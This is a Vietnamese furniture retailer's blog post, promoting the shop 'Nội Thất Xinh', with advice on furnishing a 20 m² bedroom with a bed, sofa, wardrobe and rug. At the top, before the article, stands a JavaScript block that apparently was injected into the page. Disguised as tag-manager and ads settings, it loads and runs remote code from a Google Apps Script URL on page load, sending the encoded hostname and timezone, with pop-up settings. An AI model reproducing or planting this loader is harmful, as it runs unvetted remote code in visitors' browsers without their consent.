var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Trang trí nội thất phòng ngủ diện tích 20m2

Trang trí nội thất phòng ngủ diện tích 20m2 không hề khó đâu nhé. Với những món đồ nội thất cao cấp là bạn sẽ có ngay căn phòng ngủ hiện đại, sang trọng và thư giãn nhất.

Trong phòng ngủ không thể thiếu các món đồ như giường ngủ, tủ quần áo, bàn trang điểm hay thảm trải sàn… Mỗi món đồ mang vẻ đẹp riêng và giúp hoàn thiện căn phòng của bạn.

Trang trí nội thất phòng ngủ diện tích 20m2

Bạn cần chú ý đến việc chọn các món đồ nội thất sao cho phù hợp nhé. Có như vậy mới đem lại được không gian đẹp nhất.

trang trí nội thất phòng ngủ
Phòng ngủ 20m2 nên trang trí nội thất đơn giản, nhẹ nhàng

Với giường ngủ bạn nên chọn những loại giường có thiết kế hiện đại, đơn giản. Nó có thể làm bằng gỗ tự nhiên với ga màu trắng hay màu nhẹ nhàng. Phía dưới giường bạn trải tấm thảm sofa màu nhẹ để tăng độ sang và thoáng hơn. Điều này cũng giúp bạn cảm thấy thư giãn và dễ di vào giấc ngủ.

trang trí nội thất phòng ngủ
Ghế sofa giúp căn phòng sang và có thêm diện tích để sử dụng

Phía gần cửa sổ của phòng ngủ 20m2 bạn có thể đặt bộ sofa góc kích thước nhỏ hay sofa văng chữ I, sofa đơn để có thêm diện tích ngồi và làm căn phòng sang hơn. 

Với các món đồ như bàn trang điểm, tủ quần áo bạn cũng nên chọn loại hiện đại, đơn giản nhưng tinh tế. Bàn trang điểm thiết kế đa chức năng, tủ quần áo có thể bằng gỗ hoặc kính.

trang trí nội thất phòng ngủ
Các món đồ nội thất nhẹ nhàng, hiện đại và tinh tế

Những món đồ như giường ngủ, thảm sofa, tủ quần áo, ghế sofa, bàn trang điểm đều quan trọng trong phòng ngủ 20m2. Bạn chỉ cần biết cách sắp xếp, trang trí sẽ đem lại không gian cực đẹp.

Mua nội thất phòng ngủ ở đâu tốt nhất?

Để mua các món đồ nội thất cho phòng ngủ vừa đẹp lại vừa có chất lượng quý khách hàng hãy đến ngay với Nội Thất Xinh. Rất nhiều các mẫu mã đa dạng cùng chất lượng tốt nhất của các món đồ nội thất như giường ngủ, thảm trải sàn, sofa nhập khẩu hà nội hay các loại sofa da, sofa vải.. dang chờ đợi các bạn. 

=> Tham khảo:  Sử dụng ghế sofa màu cam trong không gian sống